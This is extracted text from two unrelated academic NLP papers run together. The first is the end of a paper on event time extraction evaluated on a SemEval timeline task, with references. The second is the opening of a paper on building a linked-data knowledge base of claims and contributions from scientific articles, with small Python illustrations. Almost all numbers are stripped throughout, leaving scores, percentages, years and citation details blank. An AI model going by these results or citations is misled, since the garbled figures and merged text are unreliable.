the performance. . event timeline construction we evaluated our system on the shared task semeval- task : timeline: cross-document event or- dering (minard et al., ). the goal is to construct an event timeline for a target entity given a set of documents from wikinews on certain topics. we use the setting of track b, where the events are provided. we used heideltime to detect and normalize time expressions. we then ran our system out of the box, i.e., without retraining for the new dataset. for the shared task, an event can occur either at a specific day, in a specific month, or in a specific year. events that can not be anchored in time are removed from the evaluation. we implemented simple rules that transform our system output to the format of the shared task: if an event is simultaneous with a specific time expression, we will output this date. if our system returns that it happened before and after a certain date, it will output the year and month if both dates are in the same month. if both dates are in the same year but in different months, it will output the year. events with predicted timespans of over more than one year are rejected. for multi-day events, we only use the begin point as only this information was annotated for this shared task. two teams participated in the shared task (gpl- siua and heideltoul). currently, the best published performance was achieved by cornegruta and vla- chos ( ) with an f -score of . . our system was able to improve the total f -score by . points as depicted in table . a challenge for our system is the different anchor- ing of events in time: while our system can anchor events at two arbitrary dates, the semeval- task only anchors events either at a specific day, month system airbus gm stock total our approach . . . . cornegruta . . . . gplsiua . . . . heideltoul . . . . table : performance of our system on the semeval- task track b for the topics airbus, general motors, and stock market. or year. 
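a minimal sketch of the transformation rules just described, assuming the system output is available as python date objects; the granularity strings follow the yyyy-mm-xx / yyyy-xx-xx convention discussed below, and the dates in the usage lines are invented.

```python
from datetime import date

def to_timeline_anchor(simultaneous=None, after=None, before=None):
    """map an event-time label onto the day / month / year granularity of the shared task;
    returns None when the event is rejected (timespan over a year or underspecified)."""
    if simultaneous is not None:
        return simultaneous.isoformat()                       # anchored at a specific day
    if after is not None and before is not None:
        if (after.year, after.month) == (before.year, before.month):
            return f"{after.year:04d}-{after.month:02d}-XX"   # same month: output year and month
        if after.year == before.year:
            return f"{after.year:04d}-XX-XX"                  # same year, different months: year only
    return None  # span wider than a year or different years: treated as rejected (simplification)

print(to_timeline_anchor(after=date(2010, 3, 2), before=date(2010, 3, 28)))   # 2010-03-XX
print(to_timeline_anchor(after=date(2010, 1, 2), before=date(2011, 6, 1)))    # None
```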
when our system returns the event time value after - - and before - - , we had to decide how to anchor this event for the gen- erated timeline. for such an event, three final labels would be plausible: - -xx, - -xx, and -xx-xx. a similar challenge occurs for events that received a label like before - - . if we anchor it in - -xx, we must be certain that the event happened in november. similarly, if we an- chor it in -xx-xx, we must be certain that the event happened in . such information cannot be inferred directly from the returned label of our system. as only documents on a single topic were provided for training, we could not tune the transfor- mation accordingly. a manual analysis revealed that this transformation caused around % of the errors. conclusion event time extraction is a challenging classifica- tion task as the set of labels is infinite and the label depends on the information that is scattered across the document. the presented classifier is able to take the whole document into account and to infer the date when an event has happened. we applied the system to the timebank-eventtime corpus and achieved an accuracy of . % in comparison to an inter-annotator agreement of . % using a strict metric. for . % of the single day events, the exact event time could be extracted. this is a . percentage points improvement in comparison to the state-of-the-art approach by chambers et al. ( ). we demonstrated the generalizability by applying it to the semeval- task on timeline generation, where it improved the f -score by . percentage points compared to the state-of-the-art. acknowledgements this work has been supported by the german re- search foundation as part of the research training group adaptive preparation of information from het- erogeneous sources (aiphes) under grant no. grk / . we would like to thank the tacl editors and reviewers for their effort and the valuable feedback we received from them. references james allan. . topic detection and tracking: event- based information organization. pages – . kluwer academic publishers, norwell, ma, usa. james bergstra and yoshua bengio. . random search for hyper-parameter optimization. j. mach. learn. res., : – , february. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . inducing temporal graphs. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. taylor cassidy, bill mcdowell, nathanael chambers, and steven bethard. . an annotation framework for dense event ordering. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, usa. association for computa- tional linguistics. nathanael chambers and dan jurafsky. . jointly combining implicit constraints improves temporal or- dering. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. nathanael chambers, taylor cassidy, bill mcdowell, and steven bethard. . dense event ordering with a multi-pass architecture. transactions of the associa- tion for computational linguistics, : – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. j. mach. learn. res., : – , november. savelie cornegruta and andreas vlachos. . 
time- line extraction using distant supervision and joint in- ference. in proceedings of the conference on empirical methods in natural language processing, emnlp , austin, texas, usa, november - , , pages – . quang xuan do, wei lu, and dan roth. . joint inference for event timeline construction. in pro- ceedings of the joint conference on empirical methods in natural language processing and compu- tational natural language learning, emnlp-conll ’ , pages – , stroudsburg, pa, usa. associa- tion for computational linguistics. cı́cero nogueira dos santos, bing xiang, and bowen zhou. . classifying relations by ranking with convolutional neural networks. in proceedings of the rd annual meeting of the association for computa- tional linguistics and the th international joint con- ference on natural language processing of the asian federation of natural language processing, acl , july - , , beijing, china, volume : long pa- pers, pages – . lisa ferro. . tides. instruction manual for the annotation of temporal expressions. technical report, mitre technical report. oleksandr kolomiyets, steven bethard, and marie- francine moens. . extracting narrative timelines as temporal dependency structures. in proceedings of the th annual meeting of the association for com- putational linguistics: long papers - volume , acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. klaus krippendorff. . content analysis: an in- troduction to its methodology (second edition). sage publications. yann lecun, . generalization and network design strategies. elsevier. omer levy and yoav goldberg. . dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics, acl , june - , , baltimore, md, usa, volume : short papers, pages – . anne-lyse minard, manuela speranza, eneko agirre, itziar aldabe, marieke van erp, bernardo magnini, german rigau, and ruben urizar. . semeval- task : timeline: cross-document event order- ing. in proceedings of the th international workshop on semantic evaluation, semeval@naacl-hlt , denver, colorado, usa, june - , , pages – . james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. . the timebank corpus. in pro- ceedings of corpus linguistics , pages – , lancaster, uk. nils reimers and iryna gurevych. . reporting score distributions makes a difference: performance study of lstm-networks for sequence tagging. in proceed- ings of the conference on empirical methods in natural language processing (emnlp), pages – , copenhagen, denmark, september. nils reimers, nazanin dehghani, and iryna gurevych. . temporal anchoring of events for the time- bank corpus. in proceedings of the th annual meet- ing of the association for computational linguistics (acl ), volume : long papers, pages – . association for computational linguistics, august. roser saurı́, jessica littman, robert gaizauskas, andrea setzer, and james pustejovsky. . timeml anno- tation guidelines, version . . . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from over- fitting. j. mach. learn. res., ( ): – , jan- uary. jannik strötgen and michael gertz. . a baseline temporal tagger for all languages. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , lisbon, portugal, september. 
association for computational linguistics. mihai surdeanu. . overview of the tac knowledge base population evaluation: english slot filling and temporal slot filling. in proceedings of the tac-kbp workshop, gaithersburg, maryland, usa. naushad uzzaman and james f. allen. . trips and trios system for tempeval- : extracting temporal information from text. in proceedings of the th international workshop on semantic evaluation, semeval ' , pages – , stroudsburg, pa, usa. association for computational linguistics. naushad uzzaman, hector llorens, leon derczynski, marc verhagen, james f. allen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in proceedings of the th international workshop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa. marc verhagen, robert gaizauskas, frank schilder, mark hepple, graham katz, and james pustejovsky. . semeval- task : tempeval temporal relation identification. in proceedings of the th international workshop on semantic evaluations, semeval ' , pages – , stroudsburg, pa, usa. association for computational linguistics. marc verhagen, roser saurí, tommaso caselli, and james pustejovsky. . semeval- task : tempeval- . in proceedings of the th international workshop on semantic evaluation, semeval ' , pages – , stroudsburg, pa, usa. association for computational linguistics. katsumasa yoshikawa, sebastian riedel, masayuki asahara, and yuji matsumoto. . jointly identifying temporal relations with markov logic. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume , acl ' , pages – , stroudsburg, pa, usa. association for computational linguistics. daojian zeng, kang liu, siwei lai, guangyou zhou, and jun zhao. . relation classification via convolutional deep neural network. in coling , th international conference on computational linguistics, proceedings of the conference: technical papers, august - , , pages – , dublin, ireland.
http://europepmc.org/abstract/med/ semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud submitted august accepted november published december corresponding authors bahar sateli, sateli@semanticsoftware.info rené witte, witte@semanticsoftware.info academic editor tamara sumner additional information and declarations can be found on page doi . /peerj-cs. copyright sateli and witte distributed under creative commons cc-by . open access semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud bahar sateli and rené witte semantic software lab, department of computer science and software engineering, concordia university, montréal, québec, canada abstract motivation. finding relevant scientific literature is one of the essential tasks re- searchers are facing on a daily basis. digital libraries and web information retrieval techniques provide rapid access to a vast amount of scientific literature. however, no further automated support is available that would enable fine-grained access to the knowledge ‘stored’ in these documents. the emerging domain of semantic publish- ing aims at making scientific knowledge accessible to both humans and machines, by adding semantic annotations to content, such as a publication’s contributions, methods, or application domains. however, despite the promises of better knowledge access, the manual annotation of existing research literature is prohibitively expen- sive for wide-spread adoption. we argue that a novel combination of three distinct methods can significantly advance this vision in a fully-automated way: (i) natural language processing (nlp) for rhetorical entity (re) detection; (ii) named entity (ne) recognition based on the linked open data (lod) cloud; and (iii) automatic knowledge base construction for both nes and res using semantic web ontologies that interconnect entities in documents with the machine-readable lod cloud. results. we present a complete workflow to transform scientific literature into a semantic knowledge base, based on the w c standards rdf and rdfs. a text min- ing pipeline, implemented based on the gate framework, automatically extracts rhetorical entities of type claims and contributions from full-text scientific literature. these res are further enriched with named entities, represented as uris to the linked open data cloud, by integrating the dbpedia spotlight tool into our workflow. text mining results are stored in a knowledge base through a flexible export process that provides for a dynamic mapping of semantic annotations to lod vocabularies through rules stored in the knowledge base. we created a gold standard corpus from computer science conference proceedings and journal articles, where claim and contribution sentences are manually annotated with their respective types using lod uris. the performance of the re detection phase is evaluated against this corpus, where it achieves an average f-measure of . . we further demonstrate a number of semantic queries that show how the generated knowledge base can provide support for numerous use cases in managing scientific literature. availability. all software presented in this paper is available under open source licenses at http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements. 
development releases of individual components are additionally available on our github page at https://github.com/semanticsoftwarelab. how to cite this article sateli and witte ( ), semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud. peerj comput. sci. :e ; doi . /peerj-cs.
subjects artificial intelligence, digital libraries, natural language and speech
keywords natural language processing, semantic web, semantic publishing

introduction
in a commentary for the nature journal, berners-lee & hendler ( ) predicted that the new semantic web technologies "may change the way scientific knowledge is produced and shared." they envisioned the concept of "machine-understandable documents," where machine-readable metadata is added to articles in order to explicitly mark up the data, experiments and rhetorical elements in their raw text. more than a decade later, not only is the wealth of existing publications still without annotations, but nearly all new research papers still lack semantic metadata as well. manual efforts for adding machine-readable metadata to existing publications are simply too costly for wide-spread adoption. hence, we investigate what kind of semantic markup can be automatically generated for research publications, in order to realize some of the envisioned benefits of semantically annotated research literature.
as part of this work, we first need to identify semantic markup that can actually help to improve specific tasks for the scientific community. a survey by naak, hage & aimeur ( ) revealed that when locating papers, researchers consider two factors when assessing the relevance of a document to their information need, namely, the content and quality of the paper. they argue that a single rating value cannot represent the overall quality of a given research paper, since such a criterion can be relative to the objective of the researcher. for example, a researcher who is looking for implementation details of a specific approach is interested mostly in the implementation section of an article and will give a higher ranking to documents with detailed technical information, rather than related documents with modest implementation details and more theoretical contributions. therefore, a lower ranking score does not necessarily mean that the document has an overall lower (scientific) quality, but rather that its content does not satisfy the user's current information need.

consequently, to support users in their concrete tasks involving scientific literature, we need to go beyond standard information retrieval methods, such as keyword-based search, by taking a user's current information need into account. our vision (fig. ) is to offer support for semantically rich queries that users can ask from a knowledge base of scientific literature, including specific questions about the contributions of a publication or the discussion of specific entities, like an algorithm. for example, a user might want to ask the question "show me all full papers from the sepublica workshops, which contain a contribution involving 'linked data.'" we argue that this can be achieved with a novel combination of three approaches: natural language processing (nlp), linked open data (lod)-based entity detection, and semantic vocabularies for automated knowledge base construction (we discuss these methods in our 'background' section below).

figure : this diagram shows our visionary workflow to extract the knowledge contained in scientific literature by means of natural language processing (nlp), so that researchers can interact with a semantic knowledge base instead of isolated documents.

by applying nlp techniques for rhetorical entity (re) recognition to scientific documents, we can detect which text fragments form a rhetorical entity, like a contribution or claim. by themselves, these res provide support for use cases such as summarization (teufel & moens, ), but cannot answer what precisely a contribution is about. we hypothesize that the named entities (nes) present in a document (e.g., algorithms, methods, technologies) can help locate relevant publications for a user's task. however, manually curating and updating all these possible entities for an automated nlp detection system is not a scalable solution either. instead, we aim to leverage the linked open data cloud (heath & bizer, ), which already provides a continually updated source of a wealth of knowledge across nearly every domain, with explicit and machine-readable semantics.
if we can link entities detected in research papers to lod uris (uniform resource identifiers), we can semantically query a knowledge base for all papers on a specific topic (i.e., a uri), even when that topic is not mentioned literally in a text: for example, we could find a paper for the topic "linked data," even when it only mentions "linked open data," or even "lod," since they are semantically related in the dbpedia ontology (dbpedia ontology, http://wiki.dbpedia.org/services-resources/ontology). but linked nes alone again do not help in precisely identifying literature for a specific task: did the paper actually make a new contribution about "linked data," or just mention it as an application example? our idea is that by combining the res with the lod nes, we can answer questions like these in a more precise fashion than either technique alone.

to test these hypotheses, we developed a fully-automated approach that transforms publications and their nlp analysis results into a knowledge base in rdf (resource description framework, http://www.w .org/rdf) format, based on a shared vocabulary, so that they can take part in semantically rich queries and ontology-based reasoning. we evaluate the performance of this approach on several volumes of computer science conference and workshop proceedings and journal articles. note that all queries and results shown in this paper can be verified by visiting the paper's supplementary material webpage at http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements.
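to make the kind of query we have in mind concrete, the following minimal sketch builds a toy two-paper knowledge base and runs a sparql query that asks for documents containing a contribution linked to the dbpedia resource for "linked data." the ex: vocabulary used here is a placeholder for illustration only; the actual vocabularies of our model (pubo, sro, doco) are introduced in the 'design' section.

```python
# illustrative sketch only: a toy knowledge base and the kind of SPARQL query
# sketched above; the ex: predicates are placeholders, not our actual vocabulary.
from rdflib import Graph

toy_data = """
@prefix ex:      <http://example.org/pub#> .
@prefix sro:     <http://salt.semanticauthoring.org/ontologies/sro#> .
@prefix dbpedia: <http://dbpedia.org/resource/> .

ex:paper1 ex:hasAnnotation ex:paper1_re7 .
ex:paper1_re7 a sro:Contribution ;
              ex:containsNE dbpedia:Linked_data .

ex:paper2 ex:hasAnnotation ex:paper2_re3 .
ex:paper2_re3 a sro:Claim ;
              ex:containsNE dbpedia:Linked_data .
"""

g = Graph()
g.parse(data=toy_data, format="turtle")

# "show me all papers which contain a contribution involving 'linked data'"
query = """
PREFIX ex:      <http://example.org/pub#>
PREFIX sro:     <http://salt.semanticauthoring.org/ontologies/sro#>
PREFIX dbpedia: <http://dbpedia.org/resource/>

SELECT DISTINCT ?paper WHERE {
  ?paper ex:hasAnnotation ?re .
  ?re a sro:Contribution ;
      ex:containsNE dbpedia:Linked_data .
}
"""

for row in g.query(query):
    print(row.paper)  # only ex:paper1 matches; ex:paper2 mentions the topic in a claim
```

note how such a query separates a paper that contributes something about a topic from one that merely mentions it in a claim, which is exactly the combination of res and lod nes described above.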
background
our work is based on three foundations: nlp techniques for rhetorical entity detection, named entity recognition in linked open data, and vocabularies for semantic markup of scientific documents.

rhetorical entities
in the context of scientific literature, rhetorical entities (res) are spans of text in a document (sentences, passages, sections, etc.), where authors convey their findings, like claims or arguments, to the readers. res are usually situated in certain parts of a document, depending on their role. for example, the authors' claims are typically mentioned in the abstract, introduction or conclusion section of a paper, and seldom in the background. this conforms with the researchers' habit in both reading and writing scientific articles. indeed, according to a recent survey (naak, hage & aimeur, ), researchers stated that they are interested in specific parts of an article when searching for literature, depending on their task at hand. verbatim extraction of res from text helps to efficiently allocate the attention of humans when reading a paper, as well as improving retrieval mechanisms by finding documents based on their res (e.g., "give me all papers with implementation details"). they can also help to narrow down the scope of subsequent knowledge extraction tasks by determining zones of text where further analysis is needed.

existing works in automatic re extraction are mostly based on the rhetorical structure theory (rst) (mann & thompson, ) that characterizes fragments of text and the relations that hold between them, such as contrast or circumstance. marcu ( ) developed a rhetorical parser that derives the discourse structure from unrestricted text and uses a decision tree to extract elementary discourse units (edus) from text. the work by teufel ( ) identifies so-called argumentative zones (az) from scientific text as a group of sentences with the same rhetorical role. she uses statistical machine learning models and sentential features to extract azs from a document.
teufel's approach achieves a raw agreement of % with human annotations as the upper bound, using a naïve bayes classifier. applications of azs include document management and automatic summarization tasks.

in recent years, work on re recognition has been largely limited to biomedical and chemical documents. blake ( ) introduced the claim framework to differentiate levels of evidence, such as comparisons and observations, in implicit and explicit claims in biomedical domain literature. the hypothesisfinder (malhotra et al., ) uses machine learning techniques to classify sentences in scientific literature in order to find speculative sentences. combined with an ontology to find named entities in text, hypothesisfinder can establish hypothetical links between statements and their concepts in the given ontology. the jisc-funded art project aimed at creating an "intelligent digital library," where the explicit semantics of scientific papers is extracted and stored using an ontology-based annotation tool. the project produced sapient (semantic annotation of papers: interface & enrichment tool; http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/),
a web-based tool to help users annotate experiments in scientific papers with a set of general specific concepts (gsc) (liakata & soldatova, ). the development of sapient was eventually succeeded by the sapienta (sapient automation) tool (liakata et al., ) that uses machine learning techniques to automatically annotate chemistry papers using the art corpus as the training model. sapienta's machine learning approach has achieved an f-measure of . , . and . on the automatic detection of experiments, background and models (approaches) from chemistry papers, respectively.

document markup vocabularies
an essential requirement for the semantic publishing process is the existence of controlled vocabularies that mandate the use of pre-defined terms to describe units of information with formalized, unambiguous meaning for machines. in scientific literature mining, controlled vocabularies are implemented in the form of markup languages, like xml. based on the chosen markup language, documents can be annotated for their structure and rhetorical elements, in either a manual or automatic fashion.

structural markup
prior to analyzing scientific literature for its latent knowledge, we first need to provide the foundation for a common representation of documents, so that (i) the variations of their formats (e.g., html, pdf, latex) and publisher-specific markup can be converted to one unified structure; and (ii) various segments of a document required for further processing are explicitly marked up, e.g., by separating references from the document's main matter. a notable example is scixml (rupp et al., ), which is an xml-based markup language for domain-independent research papers. it contains a set of vocabularies that separate a document into sections that may themselves contain references, footnotes, theorems and floats, like tables and figures.
scixml also provides a stand-off annotation format to represent various linguistic metadata of a given document, for example, for encoding chemical terms. in stand-off annotation style, the original text and its annotations are separated into two different parts and connected using text offsets. the open annotation model (oam) (sanderson et al., ; http://www.openannotation.org/spec/core/) is an interoperable framework aiming towards a common specification of an annotation schema for digital resources in rdf format. the focus of the oam is on sharing annotations for scholarly purposes with a baseline model of only three classes: a target being annotated, a body of information about the target, and an annotation class that describes the relationship between the body and target, all with de-referenceable uris.

most of the existing annotation schemas, like scixml, treat documents as semantically unrelated fragments of text, whereas in scientific literature this is obviously not the case: sections of a scientific article follow a logical, argumentative order (teufel, ). peroni ( ) has a similar observation and makes a distinction between xml-like languages for document markup on the one hand and semantic markup, like rdf, on the other hand. he argues that document markup languages leave the semantics of the content to the human interpretation and lack "expressiveness for the multiple and overlapping markup on the same text." as a semantic solution, di iorio, peroni & vitali ( ) introduced the earmark markup metalanguage that models documents as collections of addressable text fragments and associates their content with owl assertions to describe their structural and semantic properties. similarly, constantin et al.
(in press) authored the doco ontology (document components ontology, http://purl.org/spar/doco), part of the spar (semantic publishing and referencing) ontology family (http://www.sparontologies.net; shotton et al., ), which defines components of bibliographic documents, like figures and references, enabling their description in rdf format.

rhetorical entity markup
in recent years, the semantic publishing community increasingly focused on developing vocabularies based on w c standards, such as rdfs and owl ontologies, for the semantic description of research publications. salt (groza et al., a) is a framework for the semantic annotation of scientific literature. it comprises three ontologies: a document ontology that defines entities like text blocks, abstract and title; a rhetorical ontology (the salt rhetorical ontology (sro), http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html) that defines concepts like claims, explanations and results; and an annotation ontology that provides the means to attach syntactic and semantic markup to the document. in the early versions of the salt framework, the embedded semantic markup was extracted from the manuscript in the compilation phase and visualized in html pages generated from the document metadata. the salt framework has been extended and adapted for extracting claims from text with the ultimate goal of creating a knowledge network from scientific publications in the konnexsalt system (groza et al., ), which provides support for (manual) identification, referencing and querying of claims in a collection of documents. groza et al. extended their rhetorical ontology with concepts, such as generalizations of claims and their related text chunks, to provide for identifying claims with possible multiple representations across a dataset. they also introduced a bibtex-like referencing system (groza et al., b) for the citation of claims that can be incorporated into the latex environment using special commands, as well as queried using a web interface.

coresc (liakata et al., ) takes a different approach to annotating scientific documents. it treats scientific literature as a human-readable representation of scientific investigations and, therefore, has a vocabulary that pertains to the structure of an investigation, like experiment or observation. coresc is itself a subpart of the expo ontology (soldatova et al., ), a comprehensive vocabulary for defining scientific experiments, like proposition or substrate. while ontologies like salt or az-ii (teufel, siddharthan & batchelor, ) focus on the rhetorical structure of a document, ontologies like coresc and expo are used for supporting reproducibility in various domains, like chemistry or the omics sciences.

named entity linking
an active research area in the semantic web community is concerned with recognizing entities in text and linking them to the lod cloud (heath & bizer, ). this task is related to, but different from, named entity recognition (ner) as traditionally performed in nlp in two aspects: first, only entities described on the lod are discovered (e.g., a city name not present on an lod source would not be detected, even if an nlp method could identify it as such) and second, each entity must be linked to a unique uri on the lod cloud.
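to illustrate what such lod-based linking produces in practice, the following minimal sketch sends a short text snippet to the public dbpedia spotlight web service (the tool is introduced below) and prints each surface form together with the dbpedia uri it was linked to. the endpoint url and response field names reflect the public demo service and may differ for a local installation.

```python
# minimal sketch: link surface forms in a text to DBpedia URIs using the public
# DBpedia Spotlight endpoint (assumed here: https://api.dbpedia-spotlight.org/en/annotate).
import requests

text = ("We present a fully-automated approach that links entities in "
        "scientific papers to the Linked Open Data cloud.")

resp = requests.get(
    "https://api.dbpedia-spotlight.org/en/annotate",
    params={"text": text, "confidence": 0.5},
    headers={"Accept": "application/json"},
    timeout=30,
)
resp.raise_for_status()

# each linked entity carries its surface form, character offset and DBpedia URI
for res in resp.json().get("Resources", []):
    print(res["@offset"], res["@surfaceForm"], "->", res["@URI"])
```

against the public endpoint, a mention such as "Linked Open Data" would typically be linked to its dbpedia resource; the returned character offsets are what allow such annotations to be mapped back onto the original document.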
a well-known tool for linked ne detection is dbpedia spotlight (mendes et al., ; daiber et al., ), which automatically annotates text with dbpedia resource uris. it compares surface forms of word tokens in a text to their mentions in the dbpedia ontology. after disambiguating the sense of a word, the tool creates a link to its corresponding concept in dbpedia. aida (yosef et al., ) is an online tool that extracts and disambiguates nes in a given text by calculating the prominence (frequency) and similarity of a mention to its related resources on the dbpedia, freebase (https://www.freebase.com) and yago (http://www.mpi-inf.mpg.de/yago-naga/yago) ontologies. usbeck et al. ( ) introduced agdistis, a graph-based method that is independent of the underlying lod source and can be applied to different languages. in their evaluation, it outperformed other existing tools on several datasets. more recently, bontcheva et al. ( ) conducted a user study on how semantic enrichment of scientific articles can facilitate information discovery. they developed a text mining pipeline based on gate that can process articles from the environmental science domain and link the entities in the documents to their dbpedia uris. their goal, however, was to enrich the documents with additional metadata, such as geographical metadata, for a semantic search web service and to automatically assign a subject field to the documents from the dublin core (weibel et al., ) ontology.

summary
in our work, we follow an approach similar to teufel's in that we use nlp techniques for recognizing res in scientific documents. however, rather than looking at documents in isolation, we aim at creating a linked data knowledge base from the documents, described with common semantic web vocabularies and interlinked with other lod sources, such as dbpedia. we are not aware of existing work that combines nlp methods for re detection with semantic web vocabularies in a fully-automated manner, especially in the computer science domain.
entity linking is a highly active research area in the semantic web community. however, it is typically applied to general, open-domain content, such as news articles or blog posts, and none of the existing datasets used for evaluation contained scientific publications. to the best of our knowledge, our work is among the first to investigate the application of entity linking on scientific documents' lod entities combined with rhetorical entities.

design
in this section, we provide a step-by-step description of our approach towards a semantic representation of scientific literature. in our system, illustrated in fig. , an automatic workflow accepts scientific literature (e.g., a journal article) as input, and processes the full-text of the document to detect various syntactic and semantic entities, such as bibliographical metadata and rhetorical entities (section 'automatic detection of rhetorical entities'). in addition, our approach uses ner tools to detect the topics mentioned in the document content and link them to resources on the lod cloud (section 'automatic detection of named entities'). finally, the extracted information is stored in a semantic knowledge base (section 'semantic representation of entities'), which can then be queried by humans and machines alike for their tasks.
figure : a high-level overview of our workflow design, where a document is fed into an nlp pipeline that performs semantic analysis on its content and stores the extracted entities in a knowledge base, inter-linked with resources on the lod cloud.

automatic detection of rhetorical entities
we designed a text mining pipeline to automatically detect rhetorical entities in scientific literature, currently limited to claims and contributions. in our classification, contributions are statements in a document that describe new scientific achievements attributed to its authors, such as introducing a new methodology. claims, on the other hand, are statements by the authors that provide declarations on their contributions, such as claiming novelty or comparisons with other related works. our re detection pipeline extracts such statements on a sentential level, meaning that we look at individual sentences to classify them into one of three categories: claim, contribution, or neither. if a chunk of text (e.g., a paragraph or section) describes a claim or contribution, it will be extracted as multiple, separate sentences. in our approach, we classify a document's sentences based on the existence of several discourse elements and so-called trigger words. we adopted a rule-based approach, in which several rules are applied sequentially on a given sentence to match against its contained lexical and discourse elements. when a match is found, the rule then assigns a type, in the form of a lod uri, to the sentence under study.

text pre-processing
as a prerequisite to the semantic analysis step, we pre-process a document's text to convert it to a well-defined sequence of linguistically-meaningful units: words, numbers, symbols and sentences, which are passed along to the subsequent processing stages (sateli & witte, ). as part of this process, the document's text is broken into tokens and lemmatized. tokens are the smallest meaningful units of text, such as words, numbers or symbols. lemmatization is the process of finding the canonical form (lemma) of each word: e.g., "run," "running" and "ran" all have the same root form ("run"). a part-of-speech (pos) tagger then assigns a pos feature to each word token, such as noun, verb or adjective. afterwards, determiners, adjectives and nouns are processed by a noun phrase (np) chunker component, which groups them into np annotations.

gazetteering
starting the semantic analysis phase, we perform gazetteering on the pre-processed text. essentially, gazetteers are lists of known entities (words and phrases) that can be directly matched against the text. if a match is found, the word is tagged with its pre-defined type and later used in the rule-matching process. we manually curated multiple gazetteer lists that contain our trigger words. for example, we have gathered a list of general terms used in computer science ( entries), such as "framework" and "approach," as well as a comprehensive list of verbs used in the scientific argumentation context ( entries), like "propose" and "develop," categorized by their rhetorical functions in a text.
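the pre-processing and gazetteering steps described here can be approximated with off-the-shelf nlp tooling. the sketch below uses spacy rather than the gate components of our actual pipeline, together with two tiny illustrative gazetteer lists, to show how lemma-based matching tags trigger words in a sentence.

```python
# illustrative sketch of the pre-processing and gazetteering steps using spaCy
# (our actual pipeline is built on GATE); requires:
#   pip install spacy && python -m spacy download en_core_web_sm
import spacy

# tiny stand-ins for the manually curated gazetteer lists described in the text
DOMAIN_TERMS = {"framework", "approach", "method", "paper"}
RHETORICAL_VERBS = {"present", "propose", "describe", "develop", "demonstrate"}

nlp = spacy.load("en_core_web_sm")
sentence = "This paper presents a new framework for annotating scientific documents."
doc = nlp(sentence)

# tokenization, lemmatization and POS tagging, with gazetteer lookups on lemmas
for token in doc:
    tags = []
    if token.lemma_.lower() in DOMAIN_TERMS:
        tags.append("DomainTerm")
    if token.lemma_.lower() in RHETORICAL_VERBS and token.pos_ == "VERB":
        tags.append("RhetoricalVerb")
    print(f"{token.text:12} lemma={token.lemma_:10} pos={token.pos_:6} {tags}")

# noun phrase (NP) chunks, analogous to the NP chunker component
print([chunk.text for chunk in doc.noun_chunks])
```

matching on lemmas, as described above, lets a single gazetteer entry such as "propose" cover "proposes," "proposed" and "proposing" without listing every surface form.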
we curated these gazetteer lists from manual inspection of the domain's literature and teufel's az corpus (argumentation zoning (az) corpus, http://www.cl.cam.ac.uk/~sht /az_corpus.html) for rhetorical entities. in order to eliminate orthographical variations of words (e.g., plural vs. singular, past tense vs. present) the gazetteering is performed on the lemmatized text. this approach also dramatically reduces the size of the gazetteer lists, since they only need to keep the canonical form of each entry for matching against the text tokens.

metadiscourse phrases
detection of a rhetorical entity is performed in incremental steps: first, we detect metadiscourse elements in text, i.e., sentences where the authors describe what is being presented in the paper. then, we classify each sentence under study based on a set of lexical and grammatical clues in the text. metadiscourse entities often contain a discourse deixis. deictic phrases are expressions within an utterance that refer to parts of the discourse. for example, the word "here" in "here, we describe a new methodology..." refers to the article that the user is reading. in scientific literature, deictic phrases are often used in metadiscourse phrases, such as the following examples that look for a sequence of token categories (e.g., determiner) and entries from our gazetteer (deixes are in bold):
rule_deictic : d + np_gazetteer
( ) "this paper presents a use case of adding value to a bird observation dataset by related weather data..." (sepublica paper )

rule_deictic : a + p
( ) "here, we demonstrate how our interpretation of nps, named graphs, knowledge resources..." (sepublica paper )

based on the detected deictic phrases, we annotate metadiscourse phrases in a sentence, like the following examples that are based on verbs from our gazetteer of rhetorical verbs:

rule_metadiscourse : dp + v_presentation
( ) "this paper presents a use case of adding value to a bird observation dataset by related weather data..." (sepublica paper )

rule_metadiscourse : dp + p + v_presentation
( ) "here, we demonstrate how our interpretation of nps, named graphs, knowledge resources..." (sepublica paper )

contributions
we designed hand-crafted rules to extract contribution sentences by finding grammatical structures often observed in scientific argumentation to describe authors' contributions. the rules look at sequences of deictic phrases, metadiscourse mentions, the rhetorical function of the verbs mentioned in the sentence and the adjacent noun phrases to classify a sentence as a contribution, like the following examples (matching string is in bold):

rule_contribution : m + np
( ) "this paper presents a use case of adding value to a bird observation dataset by related weather data..." (sepublica paper )

rule_contribution : m + a + np
( ) "here, we demonstrate how our interpretation of nps, named graphs, knowledge resources..." (sepublica paper )

claims
the extraction of claim entities is done similarly to the contribution annotations and is performed based on deictic phrases detected in a text. however, here we require that the deictic phrases in claim sentences explicitly refer to the authors' contributions presented in the paper. hence, we distinguish claims from other classes in the way that the sentence containing the deictic phrase must (i) be a statement in the form of a factual implication, and (ii) have a comparative voice or assert a property of the author's contribution, like novelty or performance:

rule_claim : m + d + a + dct
( ) "we built the first baudenkmalnetz prototype using smw [dlk+ ]." (sepublica paper )

rule_claim : dp + v + dct
( ) "our approach is compatible with the principles of nanopublications." (sepublica paper )
